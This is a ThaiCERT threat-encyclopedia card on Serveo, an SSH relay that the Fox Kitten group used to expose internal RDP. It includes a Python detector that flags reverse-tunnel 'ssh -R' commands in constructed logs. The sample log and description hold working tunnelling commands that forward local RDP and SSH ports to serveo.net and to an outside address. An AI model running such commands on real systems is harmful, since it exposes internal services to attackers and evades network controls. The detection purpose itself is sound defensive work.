
Threat Group Cards: A Threat Actor Encyclopedia

Tool: Serveo

Names: Serveo
Category: Malware
Type: Backdoor, Tunneling
Description: (ClearSky) Serveo is a free tool for opening outward-facing servers and applications on a corporate network, whether on localhost or elsewhere. Unlike Ngrok, Serveo is an SSH-only server; also, any port that is defined to it (save for 22, 80 and 443, which are accessible from outside) is given another, unassigned TCP port instead. Using this service, the attacker operated different services inside the network. Thus, for instance, the attacker operated an RDP connection through localhost on port 3389 (RDP); using Serveo, the attacker opened this RDP to the outside world through port 12618 (TCP). The attacker opened an SSH tunnel to another port in order to maintain an encrypted RDP session on the attacked target.

Moreover, as with the backdoor that had hardcoded, predefined credentials, here too the attacker separated every server that was opened to the outside world.
Information: <https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf>
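Serveo is driven by ordinary ssh(1) remote port forwarding (`ssh -R <port>:localhost:<local port> serveo.net`), so the tunnel described above shows up in endpoint telemetry as an ssh process whose command line carries a -R argument and whose destination is the relay. The detector below is an added example, not code from ClearSky, ThaiCERT or Serveo: it parses constructed process-creation events for that pattern and goes beyond the card by also flagging a -R forward of a sensitive service (RDP, SMB, SSH, WinRM) to any host outside a hypothetical jump-host allow-list, since the same technique works against an attacker's own server. The log layout, endpoint names, the allow-list and the 203.0.113.7 address are assumptions.

```python
# Added example for this tool card; not code from ClearSky, ThaiCERT or Serveo.
# Log format, endpoint names, allow-list and addresses below are constructed.
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

RELAY_HOSTS = {"serveo.net"}  # Serveo's public relay; extend with other relays (assumption)
ALLOWED_SSH_HOSTS = {"bastion.corp.example", "jump.corp.example"}  # hypothetical jump hosts
SENSITIVE_PORTS = {22: "SSH", 445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM"}
SSH_ARG_OPTS = set("BbcDEeFIiJLlmOopQRSWw")  # ssh(1) single-letter options that take a value
CMDLINE_RE = re.compile(r'cmdline="([^"]*)"')

@dataclass
class RemoteForward:
    remote_port: int  # port requested on the SSH server (0 = server picks one)
    local_host: str   # what the tunnel reaches from the client side
    local_port: int

@dataclass
class Finding:
    line_no: int
    destination: str
    reason: str
    forward: Optional[RemoteForward]

def parse_forward_spec(spec: str) -> Optional[RemoteForward]:
    """Parse '[bind_address:]port:host:hostport' as given to ssh -R."""
    parts = spec.split(":")[-3:] if spec.count(":") in (2, 3) else None
    try:
        return RemoteForward(int(parts[0]), parts[1], int(parts[2])) if parts else None
    except ValueError:
        return None

def parse_ssh_cmdline(cmdline: str) -> Optional[Tuple[str, List[RemoteForward]]]:
    """Return (destination host, -R forwards) for an ssh command line, else None."""
    argv = shlex.split(cmdline)
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in ("ssh", "ssh.exe"):
        return None
    forwards: List[RemoteForward] = []
    i = 1
    while i < len(argv) and argv[i].startswith("-") and argv[i] != "-":
        tok = argv[i]
        for j, ch in enumerate(tok[1:], start=1):
            if ch not in SSH_ARG_OPTS:
                continue  # bare flag, possibly bundled with a valued one: -NR spec
            value = tok[j + 1:]  # value glued to the flag (-R0:localhost:22) ...
            if not value:
                i += 1  # ... or given as the next token
                value = argv[i] if i < len(argv) else ""
            if ch == "R" or (ch == "o" and value.lower().startswith("remoteforward=")):
                fwd = parse_forward_spec(re.sub(r"\s+", ":", value.split("=", 1)[-1].strip()))
                if fwd:
                    forwards.append(fwd)
            break
        i += 1
    if i >= len(argv):
        return None  # no destination host: nothing to evaluate
    return argv[i].rsplit("@", 1)[-1].lower(), forwards

def evaluate(dest: str, forwards: List[RemoteForward], line_no: int) -> List[Finding]:
    """Rules: any session to a relay is suspicious; -R exposing a sensitive port elsewhere too."""
    to_relay = any(dest == h or dest.endswith("." + h) for h in RELAY_HOSTS)
    out: List[Finding] = []
    for fwd in forwards:
        svc = SENSITIVE_PORTS.get(fwd.local_port, f"port {fwd.local_port}")
        if to_relay:
            out.append(Finding(line_no, dest, f"reverse tunnel exposes {svc} on {fwd.local_host} via tunnelling relay", fwd))
        elif dest not in ALLOWED_SSH_HOSTS and fwd.local_port in SENSITIVE_PORTS:
            out.append(Finding(line_no, dest, f"reverse tunnel exposes {svc} to non-allow-listed host", fwd))
    if to_relay and not forwards:
        out.append(Finding(line_no, dest, "ssh session to tunnelling relay", None))
    return out

def scan_log(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        m = CMDLINE_RE.search(line)
        parsed = parse_ssh_cmdline(m.group(1)) if m else None
        if parsed:
            findings.extend(evaluate(*parsed, n))
    return findings

# Constructed process-creation events, not real telemetry. Line 1 mirrors the card:
# local RDP on 3389 exposed through Serveo, with 12618 as the requested outside port.
SAMPLE_LOG = [
    'ts=2020-02-10T09:12:01Z host=WS01 cmdline="ssh -R 12618:localhost:3389 serveo.net"',
    'ts=2020-02-10T09:14:22Z host=WS01 cmdline="ssh -NR 0:localhost:22 -o ServerAliveInterval=30 tunnel@serveo.net"',
    'ts=2020-02-10T10:01:05Z host=SRV02 cmdline="ssh -i C:/keys/id_ed25519 -p 22 serveo.net"',
    'ts=2020-02-10T10:03:40Z host=WS03 cmdline="ssh -L 8080:intranet.corp.example:80 jump.corp.example"',
    'ts=2020-02-10T10:05:13Z host=WS03 cmdline="ssh -R 3389:localhost:3389 ops@203.0.113.7"',
    'ts=2020-02-10T10:09:30Z host=WS04 cmdline="ssh -R 9000:localhost:9000 bastion.corp.example"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} -> {f.destination}: {f.reason}")
```

Run stand-alone it reports lines 1, 2, 3 and 5 of the sample; the -L forward on line 4 and the -R to the allow-listed bastion on line 6 are left alone. Two caveats for practitioners: the port in the -R argument is only what the client asked for, and, as the card notes, Serveo hands out an unassigned port for anything other than 22, 80 and 443, so the detector keys on intent rather than on the port the outside world actually sees; and because the whole exchange is SSH to serveo.net on TCP 22, an egress rule or DNS log check for the relay name is the natural network-side complement to this host-side rule.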

Last change to this tool card: 19 April 2020


All groups using tool Serveo

Changed  Name                                  Country  Observed

APT groups

         Parisite, Fox Kitten, Pioneer Kitten  Iran     2017-Sep 2020

1 group listed (1 APT, 0 other, 0 unknown)

Thailand Computer Emergency Response Team (ThaiCERT)
Electronic Transactions Development Agency


Report incidents: Telephone +66 (0)2-123-1234, E-mail report@thaicert.or.th, PGP key available for download.